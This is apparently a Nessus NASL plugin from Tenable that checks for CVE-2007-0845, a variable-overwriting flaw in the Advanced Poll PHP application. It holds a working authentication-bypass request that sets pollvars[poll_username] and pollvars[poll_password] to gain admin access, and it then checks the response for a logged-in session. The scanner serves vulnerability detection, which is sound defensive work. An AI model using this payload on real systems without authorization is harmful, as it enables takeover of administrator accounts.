#
# (C) Tenable Network Security
#


if (description)
{
  script_id(24284);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-0845");
  script_bugtraq_id(22451);
  script_xref(name:"OSVDB", value:"35847");

  script_name(english:"Advanced Poll Variable Overwriting Vulnerability");
  script_summary(english:"Checks if variables can be overwritten with Advanced Poll");

  desc = "
Synopsis :

The remote web server contains a PHP script that is affected by a data
modification vulnerability. 

Description :

The remote host is running Advanced Poll, a simple polling application
written in PHP. 

The version of Advanced Poll installed on the remote host includes
code to emulate PHP's 'register_globals' functionality when that
setting is disabled, which is true by default with recent versions of
PHP.  In that case, an unauthenticated remote attacker can leverage
this flaw to bypass authentication and gain control of the application
and possibly execute arbitrary code on the remote host, subject to the
permissions of the web server user id. 

See also :

http://milw0rm.com/exploits/3282

Solution :

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/pollphp", "/poll", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to overwrite variables to bypass authentication and gain admin access.
  user = SCRIPT_NAME;
  pass = rand();

  req = http_get(
    item:string(
      dir, "/admin/index.php?",
      "username=", user, "&",
      "pollvars[poll_username]=", user, "&",
      "password=", pass, "&",
      "pollvars[poll_password]=", hexstr(MD5(pass))
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we are logged in.
  if (
    string(">", user, "@") >< res &&
    'a href="admin_logout.php?session=' >< res
  )
  {
    security_hole(port);
    exit(0);
  }
}
